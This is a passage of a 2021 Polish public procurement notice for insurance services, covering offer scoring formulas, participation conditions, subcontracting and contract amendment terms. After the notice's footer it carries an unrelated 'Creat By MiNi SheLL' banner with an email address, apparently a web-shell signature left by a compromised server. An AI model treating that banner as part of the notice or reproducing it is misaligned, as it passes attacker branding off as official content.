najkorzystniejszej dla każdej z części zamówienia odrębnie, zamawiający będzie się kierował następującymi kryteriami:1/ cena oferty ( C ) - 60%2/ dodatkowy, preferowany zakres ubezpieczenia ( Z ) – 40%2.	Sposób oceniania ofert:1/ w kryterium „cena oferty”, w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najniższą wartość (cena), zostanie zastosowany następujący wzór:liczba Cn	zdobytych ( C ) = ----------- x 100 x waga kryterium 60%punktów Cbgdzie: Cn – cena najniższa wśród ofert nie odrzuconychCb – cena oferty badanej100 - wskaźnik stały – współczynnik proporcjonalności 60 – procentowe znaczenie kryterium cenyLiczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie ceny najniższej z ofert przez cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 60%.2/ w kryterium „dodatkowy, preferowany zakres ubezpieczenia” w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najwyższą wartość ( ilość punktów uzyskanych za zaakceptowanie klauzul dodatkowych opisanych w formularzu ofertowym ) zostanie zastosowany następujący wzór:liczba Zb	zdobytych ( C ) = ----------- x 100 x waga kryterium 40%punktów 100gdzie: Zb – suma punktów za zaakceptowanie klauzul dodatkowych oferty badanej100 – maksymalna ilość punktów możliwa do uzyskania ( za zaakceptowanie wszystkich klauzul opisanych w formularzu ofertowym )100 - wskaźnik stały – współczynnik proporcjonalności40 – procentowe znaczenie kryterium cenyLiczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie sumy punktów uzyskanych przez Wykonawcę za zaakceptowanie klauzul dodatkowych, preferowanych opisanych w formularzu ofertowym przez maksymalna ilość punktów możliwą do uzyskania ( za zaakceptowanie wszystkich klauzul opisanych w formularzu ofertowym ) i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 40%.Uwaga:Zamawiający informuje, iż: Klauzula lub ryzyko przyjęte w całości w treści opisanej w SIWZ otrzyma ilość punktów wskazaną w tabeli Formularza ofertowego dla danej klauzuli ( zaznaczona odpowiedź „tak” w kolumnie „2” „akceptujemy w treści opisanej w SWZ” ).Każda klauzula odrzucona otrzyma 0 (zero) punktów ( zaznaczona odpowiedź „tak” w kolumnie „ 3 „ „odrzucamy klauzulę”).W sytuacji gdy wykonawca nie wypełni żadnej z kolumn dla wybranej klauzuli także otrzyma 0 (zero) punktów.3.	Za najkorzystniejszą dla każdej Części zamówienia odrębnie zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem:P = C + Zgdzie:P – łączna liczba punktów oferty ocenianejC – liczba punktów uzyskanych w kryterium „cena oferty”Z – liczba punktów uzyskanych w kryterium „dodatkowy, preferowany zakres ubezpieczenia”. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia publicznego, mogą ubiegać się wykonawcy, którzy:a.	nie podlegają wykluczeniu na podstawie art. 108 ust. 1 Pzp;b.	wykażą spełnienie warunków dotyczących posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności odpowiedniego wpisu do rejestru działalności regulowanej, koncesji, zezwolenia lub licencji, jeżeli ich posiadanie jest niezbędne dla świadczenia usług ubezpieczeniowych w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 2.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 Pzp, zostanie uznany za spełniony, jeżeli wykonawca posiada uprawnienia do prowadzenia działalności ubezpieczeniowej. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienie, warunek zostanie spełniony, jeżeli co najmniej jeden z wykonawców posiada uprawnienia do prowadzenia działalności ubezpieczeniowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. 3.	Zamawiający wezwie Wykonawcę do przedłożenia podmiotowych środków dowodowych o których mowa pkt 2. tj. dokumentu potwierdzającego posiadanie uprawnień do wykonywania działalności ubezpieczeniowej w terminie nie krótszym niż 5 dni od dnia wezwania, aktualnych nie dzień ich złożenia. 4.	Zgodnie z art. 58 ust. 1 Pzp wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.5.	W przypadku wyboru oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający uprawniony jest, przed zawarciem umowy w sprawie zamówienia publicznego, do żądania poświadczonej za zgodność kopii umowy regulującej współpracę tych wykonawców.6.	Przepis art. 118 Pzp nie ma w niniejszym postępowaniu zastosowania.7.	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.8.	Zgodnie z art. 462 ust. 2 Pzp Wykonawca zobowiązany jest wskazać w ofercie, części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podania nazw podwykonawców. W tym przypadku Wykonawca załącza wykaz zgodnie z załącznikiem nr 5 do SWZ9.	Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia wykonawcy z odpowiedzialności za należyte wykonanie tego zamówienia.10.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. 11.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. 12. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. 13. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt 12 powinno potwierdzać, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa, w szczególności: 1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby; 2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; 3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. 14 Zamawiający oceni, czy udostępniane wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu określonych w postępowaniu, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem wykonawcy. 15. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy. 16 Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie potwierdzają spełniania przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, zamawiający żąda, aby wykonawca w terminie określonym przez zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.17. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3.	Na podstawie art. 274 ust. 1 Pzp w zw. z § 3 Rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy, w celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, zamawiający wezwie wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp w zakresie art. 108 ust.1 Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1Dokumenty i oświadczenia na potwierdzenie braku podstaw wykluczenia i spełnienia warunków udziału w postępowaniu, o których mowa w art. 125 ust. 1 Pzp, składane zgodnie ze wzorem stanowiącym załącznik nr 3 i 4 do SWZ (Rozdział II SWZ).2.	W przypadku wspólnego ubiegania się o udzielenie zamówienia przez wykonawców, oświadczenia i dokumenty, o których mowa wyżej, składa każdy z wykonawców. wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem i dokumentami wskazanymi jak wyżej, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim wykonawca powołuje się na jego zasoby.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w sprawie zamówienia publicznego w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 1.	Zmiana umowy może być wprowadzona w zakresie:a. przedmiotu zamówienia (przedmiotu i zakresu ubezpieczenia);b. terminu wykonania zamówienia;c. wynagrodzenia Wykonawcy. 2.	Do okoliczności, po wystąpieniu których, Zamawiający przewiduje możliwość wprowadzenia zmiany należą:1)	zmiana obowiązujących przepisów prawa, w tym jeśli powstanie obowiązek ich wdrożenia, w zakresie w jakim zmiany te dotyczyć będą niniejszej umowy lub wynikających z niej umów ubezpieczenia, w szczególności w zakresie:a.	kodeksu cywilnego oraz przepisów o działalności ubezpieczeniowej, które będą miały wpływ na kształt warunków stanowiących podstawę udzielanej ochrony ubezpiecze¬niowej - w zakresie, w jakim zmiany te dotyczyć będą niniejszej umowy lub wynikających z niej umów ubezpieczenia;b.	zmiany przepisów o zamówieniach publicznych, jeśli Zamawiający będzie zobowiązany uwzględnić je w umowie zawartej przed taką zmianą;c.	zmiany przepisów prawa międzynarodowego, które zobowiązana będzie zobowiązana wdrożyć Rzeczpospolita Polska, w tym organy jej administracji samorządowej;d.	nastąpi wydanie decyzji, uchwał, postanowień, rozstrzygnięć, orzeczeń, wyroków itp. przez uprawnione organy, które będą zobowiązywały Zamawiającego do zmiany zawartej umowy lub wynikających z niej umów ubezpieczenia,2) zmiany podmiotowe u Zamawiającego: a.	zmiana (rozszerzenie lub zawężenie) zakresu prowadzonej przez Zamawiającego działalności;b.	zmiana (zwiększenie lub zmniejszenie) posiadanego przez Zamawiającego majątku;c.	zmiany dotyczące osób objętych ubezpieczeniem, polegające na powstawaniu nowych jednostek (w tym podmiotów objętych zamówieniem), przekształceniach, połączeniach, likwidacji jednostek istniejących, zmianach własnościowych lub ich formy prawnej,d.	potrzeba rozszerzenia zakresu ubezpieczenia, w tym obowiązek ubezpieczenia wynikający z zawartych umów najmu, dzierżawy, leasingu lub innych o podobnym charakterze;e.	rozwiązanie/ likwidacja podmiotu objętego zamówieniem.3)	zmiany przedmiotowego zakresu zamówienia, tj.:a.	wzrostu albo spadku sumy ubezpieczenia,b.	zwiększenia sumy ubezpieczenia w związku z modernizacją przedmiotu ubezpieczenia, przeprowadzonymi inwestycjami, adaptacją, rozbudową itp.,c.	zmiany wysokości sum ubezpieczenia, wynikającej ze zobowiązań Zamawiającego zaciągniętych po zawarciu umowy,d.	zmiany wysokości sum gwarancyjnych, wynikającej ze zobowiązań Zamawiającego zaciągniętych po zawarciu umowy,e.	zmiany wykonywanej działalności i konieczności objęcia zmiany tej ochroną ubezpieczeniową,f.	rozszerzenia zakresu ubezpieczenia w przypadku ujawnienia się bądź powstania nowego ryzyka ubezpieczeniowego, nieprzewidzianego lub pominiętego w specyfikacji warunków zamówienia i konieczności zawarcia nowego rodzaju ubezpieczenia, g.	modyfikacji zakresu ochrony ubezpieczeniowej, w tym w związku ze zobowiązaniami Zamawiającego zaciągniętymi po zawarciu umowy,h.	wyczerpania sumy ubezpieczenia w ubezpieczeniu systemem pierwszego ryzyka lub limitów odszkodowawczych w klauzulach i innych warunkach umowy ubezpieczenia oraz wyczerpania sumy gwarancyjnej bądź podlimitów odszkodowawczych w ubezpieczeniu odpowiedzialności cywilnej i konieczności ich uzupełnienia;4)	inne: a.	potrzeba wydłużenia terminu realizacji umowy na wniosek Zamawiającego maksymalnie o 6 miesięcy z przyczyn technicznych lub w sytuacji braku możliwości udzielenia zamówienia na usługę ubezpieczenia, zgodnie z przepisami ustawy Pzp, przed upływem terminu realizacji zamówienia publicznego, zapewniającego Zamawiającemu ciągłość ochrony ubezpieczeniowej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-04-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-04-19 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-05-17</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-08 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com